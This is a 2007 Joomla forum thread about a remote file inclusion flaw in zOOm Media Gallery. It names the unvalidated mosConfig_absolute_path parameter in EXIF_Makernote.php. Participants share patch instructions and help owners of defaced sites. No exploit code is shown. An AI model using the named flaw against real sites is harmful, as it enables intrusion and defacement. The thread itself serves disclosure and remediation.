Zoom Media Gallery version 2.5.1 RC4 and prior
Moderator: General Support Moderators
Forum rules
- brian
- Joomla! Master
- Posts: 12781
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Zoom Media Gallery version 2.5.1 RC4 and prior
A vulnerability has been identified in zOOm Media Gallery , which could be exploited by remote attackers to execute arbitrary commands. This issue is due to an input validation error in the "lib/iptc/EXIF_Makernote.php" script that does not validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.
Source http://www.frsirt.com/english/advisories/2007/1353
Source http://www.frsirt.com/english/advisories/2007/1353
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
- mikedeboer
- Joomla! Apprentice
- Posts: 7
- Joined: Sat Aug 20, 2005 3:59 pm
- Contact:
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!
To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P
To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P
- brian
- Joomla! Master
- Posts: 12781
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Sorry Mike,not my strongpoint.
Maybe put a post asking for developers in another part of the forum
Maybe put a post asking for developers in another part of the forum
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
-
- Joomla! Fledgling
- Posts: 2
- Joined: Mon Feb 26, 2007 7:13 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Hi Mike where I can sign-up.mikedeboer wrote: I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!
To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P
- mikedeboer
- Joomla! Apprentice
- Posts: 7
- Joined: Sat Aug 20, 2005 3:59 pm
- Contact:
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Thanks Brian, I will.
If it's possible, could you send a short resumee (or something listing your experience) to 'mike AT zoomfactory DOT org'...or simply PM meZZzzzz wrote: Hi Mike where I can sign-up.
-
- Joomla! Fledgling
- Posts: 2
- Joined: Mon Feb 26, 2007 7:13 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
To fix the security please update the EXIF_Makernote.php and EXIF.php with the ones include in this attachment.
Put it in the /components/com_zoom/lib/iptc/
a new release will be available soon on the zoom factory website
http://www.zoomfactory.org
Put it in the /components/com_zoom/lib/iptc/
a new release will be available soon on the zoom factory website
http://www.zoomfactory.org
You do not have the required permissions to view the files attached to this post.
-
- Joomla! Apprentice
- Posts: 12
- Joined: Mon Dec 05, 2005 11:04 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
I suppose that includes putting an .asp file containing facilities to examine your site files and deface it anytime (see attached screenshot)? Or should I be looking for something else here?brian wrote: which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.
It worries me that once they put that file on your site, they can get your db details from configuration.php. You can imagine they can get whatever ftp account details are stored unprotected in any of the php files, for example in file safemode.php which is used by ZoomGallery component for allowing image uploading when/if safe mode is set to on, which many hosting providers still do today...
Any solution to protecting the db account details? How does Joomla address this, i.e. information in configuration.php being exposed? I know upgrading to the latest Joomla version and the latest versions of 3rd party add-ons is critical but there will always be security flaws to fix surely.
Regards,
A.Fraile
EDIT MOD: image doing publicity for hacker removed. No need to help the hackers.
Last edited by infograf768 on Wed May 30, 2007 7:23 am, edited 1 time in total.
-
- Joomla! Apprentice
- Posts: 44
- Joined: Thu Mar 30, 2006 10:55 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Bit confused but if I understand right from Zoom forum messages.ZZzzzz wrote: To fix the security please update the EXIF_Makernote.php and EXIF.php with the ones include in this attachment.
Put it in the /components/com_zoom/lib/iptc/ a new release will be available soon on the zoom factory website
http://www.zoomfactory.org
1. The hack will not work if register globals is set off in both php as well as globals.php?
2. If using rc4 or prior your patch should be applied? Is the patch applied in the lastest Zoom download on the Zoom website why is the patch not available from the official Zoom website?
-
- Joomla! Fledgling
- Posts: 3
- Joined: Fri Dec 28, 2007 5:55 pm
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Hi!!
need urgent help! my site has been defaced! a gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?
need urgent help! my site has been defaced! a gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?
-
- Joomla! Apprentice
- Posts: 44
- Joined: Thu Mar 30, 2006 10:55 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Can we have some more information which version are you using, did you apply the security patch posted by Mike, your security settings globals etc…cadenza wrote: Hi!! need urgent help! my site has been defaced! a gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?
-
- Joomla! Fledgling
- Posts: 3
- Joined: Fri Dec 28, 2007 5:55 pm
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me to ask where to find the 2 update files mentioned earlier on in this thread?
any idea how I can remove the inserted gif inbetween my photo galleries? which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...
Thanks in advanced!
any idea how I can remove the inserted gif inbetween my photo galleries? which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...
Thanks in advanced!
-
- Joomla! Apprentice
- Posts: 44
- Joined: Thu Mar 30, 2006 10:55 am
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
There is a vulnerability [1] in all version prior to 2.5.1 RC4. I would start by removing your current version since it is hard to tell which files have been compromised and load the latest version from the Zoom website [2]. For the patch posted in this thread you have to login, the second message from ZZzzzz (April 16, 2007, 09:13:21 AM) contains file.cadenza wrote: I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me to ask where to find the 2 update files mentioned earlier on in this thread? any idea how I can remove the inserted gif inbetween my photo galleries? which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...
[1] http://help.joomla.org/component/option ... temid,268/
[2] http://www.zoomfactory.org/index.php?op ... elect&id=1
-
- Joomla! Fledgling
- Posts: 3
- Joined: Fri Dec 28, 2007 5:55 pm
Re: Zoom Media Gallery version 2.5.1 RC4 and prior
Thanks! but is there a way to do it so that my existing galleries will remain? ie. upgrade instead of a re-installation?